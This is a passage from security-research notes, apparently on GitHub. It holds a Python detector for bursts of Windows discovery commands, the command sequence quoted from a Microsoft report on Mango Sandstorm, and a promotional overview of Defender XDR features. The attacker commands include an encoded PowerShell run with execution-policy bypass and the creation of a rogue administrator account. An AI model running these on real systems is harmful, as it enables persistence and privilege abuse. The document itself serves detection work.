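Before the Mango Sandstorm commands, here is the defender's side of the discovery commands broken down above (the Secret Blizzard batch file and the Storm-0270 commands). This is an added example, my code rather than anything from the original note or the Microsoft blogs: it takes process-creation events, classifies each command line into the note's discovery sub-categories, and reports a parent process that runs commands from several categories within a short window. Everything in it is an assumption: the prefix-to-category mapping, the DeviceProcessEvents-like field names (`Timestamp`, `DeviceName`, `ParentProcessId`, `CommandLine`), the 5-minute window, the 4-category threshold, and the constructed events with placeholder host names.

```python
"""Flag bursts of host-discovery commands from one parent process (added example, constructed events)."""
from collections import defaultdict
from datetime import datetime, timedelta

# Discovery sub-categories from the breakdown above, keyed by command prefix.
# Assumption: this mapping is mine; it is not taken from the Microsoft blogs.
DISCOVERY_CATEGORIES = {
    "system_info": ("ver", "systeminfo", "set"),
    "network": ("ipconfig", "route", "arp", "netstat"),
    "users": ("whoami", "wmic useraccount", "net user", "net localgroup"),
    "shares": ("net share", "net use"),
    "system_config": ("net accounts", "net config", "net time"),
    "firewall": ("netsh firewall", "netsh advfirewall"),
    "processes": ("tasklist",),
    "patches": ("get-hotfix", "wmic qfe"),
    "registry": ("reg query",),
    "files": ("dir", "tree"),
}
WRAPPERS = ("cmd.exe /c ", "cmd /c ", "powershell.exe ", "powershell ")


def classify(command_line):
    """Return the discovery category of a command line, or None if it is not a discovery command."""
    cl = " ".join(command_line.lower().split())  # normalise case and whitespace
    for w in WRAPPERS:  # look through cmd.exe /C and powershell launchers
        if cl.startswith(w):
            cl = cl[len(w):]
    tokens = cl.split()
    if "/add" in tokens or "/delete" in tokens:
        return None  # account or share manipulation, not discovery
    for category, prefixes in DISCOVERY_CATEGORIES.items():
        if any(cl == p or cl.startswith(p + " ") for p in prefixes):
            return category
    return None


def discovery_bursts(events, window=timedelta(minutes=5), min_categories=4):
    """Report (device, parent pid) pairs whose discovery commands span >= min_categories within window.

    A single `dir` or `ipconfig` is routine admin activity; the signal is many distinct
    categories from one parent in a short time, which is exactly what the batch file above produces.
    """
    per_parent = defaultdict(list)
    for ev in events:
        category = classify(ev["CommandLine"])
        if category:
            per_parent[(ev["DeviceName"], ev["ParentProcessId"])].append(
                (datetime.fromisoformat(ev["Timestamp"]), category, ev["CommandLine"]))
    findings = []
    for (device, ppid), items in per_parent.items():
        items.sort()
        for i in range(len(items)):
            in_window = [it for it in items[i:] if it[0] - items[i][0] <= window]
            categories = {c for _, c, _ in in_window}
            if len(categories) >= min_categories:
                findings.append({"DeviceName": device, "ParentProcessId": ppid,
                                 "Start": in_window[0][0], "End": in_window[-1][0],
                                 "CategoryCount": len(categories), "Categories": sorted(categories),
                                 "CommandLines": [cmd for _, _, cmd in in_window]})
                break  # one finding per parent is enough for triage
    return findings


def _ev(ts, device, ppid, cmd):
    """Constructed event shaped like the DeviceProcessEvents columns named above (field names assumed)."""
    return {"Timestamp": ts, "DeviceName": device, "ParentProcessId": ppid, "CommandLine": cmd}


SAMPLE_EVENTS = [  # constructed: one cmd.exe parent (pid 4120) running the batch file, plus helpdesk noise
    _ev("2024-12-02T09:00:01", "FILESRV01", 4120, "ver"),
    _ev("2024-12-02T09:00:02", "FILESRV01", 4120, "systeminfo"),
    _ev("2024-12-02T09:00:04", "FILESRV01", 4120, "ipconfig -all"),
    _ev("2024-12-02T09:00:05", "FILESRV01", 4120, "arp -a"),
    _ev("2024-12-02T09:00:05", "FILESRV01", 4120, "netstat -a -n"),
    _ev("2024-12-02T09:00:06", "FILESRV01", 4120, "net share"),
    _ev("2024-12-02T09:00:07", "FILESRV01", 4120, "whoami /all"),
    _ev("2024-12-02T09:00:09", "FILESRV01", 4120, "tasklist /v"),
    _ev("2024-12-02T09:00:10", "FILESRV01", 4120, "powershell get-hotfix"),
    _ev("2024-12-02T09:00:12", "FILESRV01", 4120, "reg query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run"),
    _ev("2024-12-02T09:00:13", "FILESRV01", 4120, "dir /x c:\\"),
    _ev("2024-12-02T09:30:00", "WS07", 3304, "ipconfig /all"),  # helpdesk troubleshooting
    _ev("2024-12-02T09:31:00", "WS07", 3304, "dir C:\\Users\\alice\\Documents"),
    _ev("2024-12-02T10:15:00", "WS07", 3304, "cmd.exe /C net user admin * /add"),  # not discovery
]

if __name__ == "__main__":
    for f in discovery_bursts(SAMPLE_EVENTS):
        print(f"{f['DeviceName']} ppid={f['ParentProcessId']} {f['CategoryCount']} categories "
              f"in {(f['End'] - f['Start']).seconds}s: {', '.join(f['Categories'])}")
```

The threshold is on distinct categories rather than command count, so a user who runs `dir` twenty times does not trigger it, while the batch file above trips it within its first dozen commands. Account-creation forms such as `net user ... /add` are deliberately excluded here; they belong to a separate persistence detection, not to discovery.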

- [MERCURY leveraging Log4j 2 vulnerabilities in unpatched systems to target Israeli organizations](https://www.microsoft.com/en-us/security/blog/2022/08/25/mercury-leveraging-log4j-2-vulnerabilities-in-unpatched-systems-to-target-israeli-organizations/)

![image](https://github.com/user-attachments/assets/6d346324-9dc7-4159-ba0b-22643613fc9f)
> Figure 1. Observed MERCURY attack chain

> [!Note]
> MERCURY is now tracked as Mango Sandstorm.

### Command :
Here are the details of each command from the top.
- Displays the current logged-in user (e.g., DOMAIN\Username)
- Runs an encoded PowerShell script while bypassing execution policy
- Shows the computer's hostname
- Displays detailed network configuration information
- Lists all user accounts on the system
- Lists all accounts in the Administrators group
- Creates a new user account named admin
- Adds the admin user to the Administrators group
- Shows logged-in users and active sessions
```cmd
cmd.exe /C whoami
cmd.exe /C powershell -exec bypass -w 1 -enc UwB….
cmd.exe /C hostname
cmd.exe /C ipconfig /all
cmd.exe /C net user
cmd.exe /C net localgroup administrators
cmd.exe /C net user admin * /add
cmd.exe /C net localgroup Administrators admin /add
cmd.exe /C quser
```

#### Disclaimer
The views and opinions expressed herein are those of the author and do not necessarily reflect the views of the company.
-------------------------------------------------------------------------------- /SecurityResearcher-Note-Folder/Day15-XDR-Insights-2024update.md: --------------------------------------------------------------------------------
# XDR Insights, Microsoft Security in 2024
[Date : 2024-02-05]

Hello, all defenders !!
Thank you for visiting my security research note.
As we saw a number of XDR updates at Microsoft Ignite last year, this time I would like to introduce the new features and share insights about XDR, specifically what we can do by leveraging these powerful tools.

By the way, this is the updated XDR blog. If you want to see the previous one, you can also check here.

👉 [Day09-XDR-Insights-part1.md](https://github.com/LearningKijo/SecurityResearcher-Note/blob/main/SecurityResearcher-Note-Folder/Day09-XDR-Insights-part1.md)

Before we delve deeper into XDR... for those who are hearing this term for the first time,

> [!Important]
> **What is XDR ?**
>
> Extended Detection and Response (XDR) describes ***a unified security incident detection and response platform that automatically collects and correlates data from multiple proprietary security components***,
> as recognized by Gartner® Innovation Insight for Extended Detection and Response.

#### Microsoft Defender XDR ?
Microsoft Security provides an XDR solution – ***Microsoft Defender XDR*** (formerly Microsoft 365 Defender). To avoid any confusion for those familiar with Microsoft 365 Defender, let me take a moment to explain its history and provide the latest update.

![image](https://github.com/LearningKijo/SecurityResearcher-Note/assets/120234772/ac502e17-c76e-4531-bda4-c48f1304c9a5)
> Microsoft Security with XDR solution

## Gartner® Magic Quadrant™
Recently, Microsoft published a blog about the market research results for Endpoint Protection (including XDR)[^1], in which Microsoft was again named a ***Leader***.
As the results over the past three years show, Microsoft has consistently maintained its position as a Leader[^2][^3].

[^1]: [Microsoft is named a Leader in the 2023 Gartner® Magic Quadrant™ for Endpoint Protection Platforms](https://www.microsoft.com/en-us/security/blog/2024/01/12/microsoft-is-named-a-leader-in-the-2023-gartner-magic-quadrant-for-endpoint-protection-platforms/)
[^2]: [Gartner names Microsoft a Leader in the 2021 Endpoint Protection Platforms Magic Quadrant](https://www.microsoft.com/en-us/security/blog/2021/05/11/gartner-names-microsoft-a-leader-in-the-2021-endpoint-protection-platforms-magic-quadrant/)
[^3]: [Microsoft is named a Leader in the 2022 Gartner® Magic Quadrant™ for Endpoint Protection Platforms](https://www.microsoft.com/en-us/security/blog/2023/03/02/microsoft-is-named-a-leader-in-the-2022-gartner-magic-quadrant-for-endpoint-protection-platforms/)

![image](https://github.com/LearningKijo/SecurityResearcher-Note/assets/120234772/433e2d01-c8bc-4e23-8596-fe2c54ece314)

> Gartner® Magic Quadrant™ 2021 - 2023

## Combined incidents queue, XDR
Thanks to the power of XDR, Microsoft Defender XDR incidents continuously provide excellent correlation capabilities, consolidating multiple Defender alerts and all affected entities into a cohesive view - ***a single unified incident***.
The XDR update, especially in the incident section, is as follows:
Last year, Microsoft announced at Ignite that Microsoft Defender XDR would incorporate cloud workload alerts, signals, and asset information from Microsoft Defender for Cloud[^4]. Now, as of January 2024, this integration is ***generally available***.

![image](https://github.com/LearningKijo/SecurityResearcher-Note/assets/120234772/31ad8d4d-946a-4860-8fe9-1f41183f325e)
> Detection of cryptojacking in Microsoft Defender XDR

> [!Important]
> **(GA)** Microsoft Defender for Cloud alerts integration with Microsoft Defender XDR is ***now generally available*** - [January 2024](https://learn.microsoft.com/en-us/microsoft-365/security/defender/whats-new?view=o365-worldwide#january-2024).
> Learn more about the integration in Microsoft Defender for Cloud in Microsoft Defender XDR.

[^4]: [Ignite news: XDR in an era of end-user-to-cloud cyberattacks and securing the use of AI](https://techcommunity.microsoft.com/t5/microsoft-defender-xdr-blog/ignite-news-xdr-in-an-era-of-end-user-to-cloud-cyberattacks-and/ba-p/3982002)

## Automatic attack disruption
Automatic attack disruption in Microsoft Defender XDR uses XDR signals from different sources (endpoints, email, identity, data) to ***automatically contain compromised assets and stop ongoing cyber attacks, minimizing their impact on organizations***.

> [!Note]
> What is the objective of attack disruption? -
> The main objective of this feature is to achieve ***containment*** during the incident response phase. In terms of automatic disruption, there are three actions that can be taken:
>
> | Source | Action |
> |:--------------------------------|:---------------------------------|
> | Microsoft Defender for Identity | [Disable user in Active Directory](https://learn.microsoft.com/en-us/defender-for-identity/remediation-actions) |
> | Microsoft Defender for Endpoint | [Contain devices from the network](https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/respond-machine-alerts?view=o365-worldwide#contain-devices-from-the-network) |
> | Microsoft Defender for Endpoint | [Contain user from the network](https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/respond-machine-alerts?view=o365-worldwide#contain-user-from-the-network) ***(NEW ACTION)*** |

Microsoft Defender XDR provides coverage for the following advanced attacks to disrupt further progression.

| Advanced attack | Microsoft Security blog |
|:----------------|:------------------------|
| Adversary-in-the-middle attacks (AiTM) | [Automatically disrupt adversary-in-the-middle (AiTM) attacks with XDR](https://techcommunity.microsoft.com/t5/microsoft-365-defender-blog/automatically-disrupt-adversary-in-the-middle-aitm-attacks-with/ba-p/3821751) |
| Business email compromise (BEC) | [XDR attack disruption in action – Defending against a recent BEC attack](https://techcommunity.microsoft.com/t5/microsoft-365-defender-blog/xdr-attack-disruption-in-action-defending-against-a-recent-bec/ba-p/3749822) |
| Human-operated ransomware attacks | [Automatic disruption of Ransomware and BEC attacks with Microsoft 365 Defender](https://techcommunity.microsoft.com/t5/microsoft-365-defender-blog/automatic-disruption-of-ransomware-and-bec-attacks-with/ba-p/3738294) |
| SAP financial process manipulation ***(NEW)*** | [Gaining control of SAP applications security and automatic attack disruption](https://www.youtube.com/live/-ijnGxRnwks?si=wcoSa2LHFGJlhW9G) |

As there have been various SAP-related breaches during Covid-19, and since it is quite challenging to identify them without correlating with signals from other products, the SAP connector was released in Microsoft Sentinel[^5].
This helps visualize SAP activities and supports detection, providing out-of-the-box detections as well as customizable detections for SOC personnel.

***Additionally, SAP financial process manipulation has been added to the scenarios covered by Automatic Attack Disruption in Microsoft Defender XDR !!***

> [!Important]
> SAP financial process manipulation is currently in private preview.

![image](https://github.com/LearningKijo/SecurityResearcher-Note/assets/120234772/89880caa-474f-4df7-8ba0-5f5c3d1bff66)
> SAP financial process manipulation, Incident page in Microsoft Defender XDR

[^5]: [Protecting your SAP environment from threats | Microsoft Sentinel in the Field #8](https://youtu.be/Yhc8vtiU0bo?si=uyDysgDjdTtmCKce)

## Deception
Deception is a new capability in XDR, and personally, the Ignite event left me both confused and pleasantly surprised.
Deception's objective is to deceive someone, and in this case, the target is an attacker. However, the aim is not only to deceive them but specifically to ***visualize the attacker's footprint***.
Microsoft Defender XDR achieves this by creating ***fake accounts, devices, and content strategically designed to entice and provoke, providing insights into the attacker's actions.***

To carry out deception, "decoys" and "lures" are essential....

***What are decoys and lures ?....***
| Type | Details |
|:-------|:---------|
| Decoys | These are ***fake devices and accounts*** that appear to belong to your network. When an attacker engages with decoys, alerts are generated, and you can see the activities on the Incident page of the Microsoft Defender XDR portal. |
| Lures | These are ***fake contents, such as documents and batch files***, strategically planted on specific devices or accounts to attract an attacker. |

**👉 These are great resources to catch up on deception features.**
1.
   [Manage the deception capability in Microsoft Defender XDR](https://learn.microsoft.com/en-us/microsoft-365/security/defender/deception-overview?view=o365-worldwide)
2. [Ignite News: Augment your EDR with deception tactics to catch adversaries early](https://techcommunity.microsoft.com/t5/microsoft-defender-for-endpoint/ignite-news-augment-your-edr-with-deception-tactics-to-catch/ba-p/3982253)
3. [Virtual Ninja Training : Microsoft Defender for Endpoint deception](https://www.youtube.com/live/k2QxyVH--vU?si=_UT46YWTDPS6wyTZ)

![image](https://github.com/LearningKijo/SecurityResearcher-Note/assets/120234772/b4a0b1f9-1d32-49ad-a79f-9ef6f8cdd625)
> Deception technology, through high confidence detections of human-operated lateral movement, alerts security teams when an attacker interacts with fake hosts or lures

## Security Copilot
We have been seeing a number of updates and enhancements regarding Microsoft Defender XDR, and additionally, Microsoft Security Copilot is coming soon.
All I can say is this: it is a ***game-changer***.

First, there are two different experiences you will see in Security Copilot.
- [x] **Standalone** : This includes experiences such as asking questions across security products in the Security Copilot portal.
- [x] **Embedded** : This is literally Security Copilot embedded into the Microsoft Defender XDR portal, and security teams can leverage it for dealing with day-to-day security incidents and responses.

![image](https://github.com/LearningKijo/SecurityResearcher-Note/assets/120234772/58a7b75e-909d-4f0e-9529-44db2773e440)
> Security Copilot : Standalone & Embedded
>
> 👉 Check this out !!
> [Microsoft Security Copilot drives new product integrations at Microsoft Ignite to empower security and IT teams](https://www.microsoft.com/en-us/security/blog/2023/12/06/microsoft-security-copilot-drives-new-product-integrations-at-microsoft-ignite-to-empower-security-and-it-teams/)

Here are some things you can do with Microsoft Security Copilot !!
1. Summarize incidents quickly
2. Take action on incidents through guided responses
3. Get results fast when analyzing scripts and code
4. Generate KQL queries from natural-language input
5. Write incident reports efficiently

For more details, you can explore several resources to understand how Security Copilot works. However, I would like to emphasize the following five points that highlight how our SOC world is changing, as I mentioned – **"truly a game-changer"**.

***Before Security Copilot.....***

1. The SOC team triages an incident and identifies what is happening across multiple domains, including email, endpoint, identity, data, and more.
   ***Now, Security Copilot helps us understand incidents right away without spending additional time[^6].***

2. The SOC team investigates incidents and makes decisions for each asset based on the type of attack.
   Sometimes, this can be challenging. However, Security Copilot helps by ***suggesting recommendations such as Triage, Containment, Investigation, and Remediation for each specific attack[^7]***.

3. The SOC team also needs to analyze scripts to determine the type of command executed, and decryption/decoding may be required depending on the attack.
   While Microsoft Defender for Endpoint excels in capturing script execution, understanding the content still requires specific skills and knowledge.
   However, Security Copilot ***immediately analyzes the code written in the script and tells us exactly what is happening.*** This helps the SOC team save time in script analysis[^8].

4. KQL in Advanced Hunting is the most powerful tool in Microsoft Defender XDR, allowing us to view activities as raw data by writing KQL.
   However, writing a query from scratch can be a challenge, especially for those unfamiliar with it.
   Security Copilot ***addresses this issue by assisting in generating KQL queries through questions or requests made to the tool[^9]***.

5. The SOC team usually writes incident reports in the form of logs, which can be time-consuming.
   Security Copilot streamlines this process by ***generating incident reports and even creating PowerPoint slides in the standalone portal[^10]***.

[^6]: [Summarize an incident with Microsoft Security Copilot in Microsoft Defender XDR](https://learn.microsoft.com/en-us/microsoft-365/security/defender/security-copilot-m365d-incident-summary?view=o365-worldwide)
[^7]: [Use guided responses with Microsoft Security Copilot in Microsoft Defender XDR](https://learn.microsoft.com/en-us/microsoft-365/security/defender/security-copilot-m365d-guided-response?view=o365-worldwide)
[^8]: [Analyze scripts and codes with Microsoft Security Copilot in Microsoft Defender XDR](https://learn.microsoft.com/en-us/microsoft-365/security/defender/security-copilot-m365d-script-analysis?view=o365-worldwide)
[^9]: [Microsoft Security Copilot in advanced hunting](https://learn.microsoft.com/en-us/microsoft-365/security/defender/advanced-hunting-security-copilot?view=o365-worldwide)
[^10]: [Create an incident report with Microsoft Security Copilot in Microsoft Defender XDR](https://learn.microsoft.com/en-us/microsoft-365/security/defender/security-copilot-m365d-create-incident-report?view=o365-worldwide)

## What's next ?
Unified XDR & SIEM is coming soon !! As of now, this is still in private preview, but I hope the public preview is coming soon.
- [Microsoft Defender XDR, Security Copilot & Microsoft Sentinel now in one portal](https://youtu.be/snV2joMnSlc?si=5NCzOqppxtubZQsr)

#### Disclaimer
The views and opinions expressed herein are those of the author and do not necessarily reflect the views of the company.
--------------------------------------------------------------------------------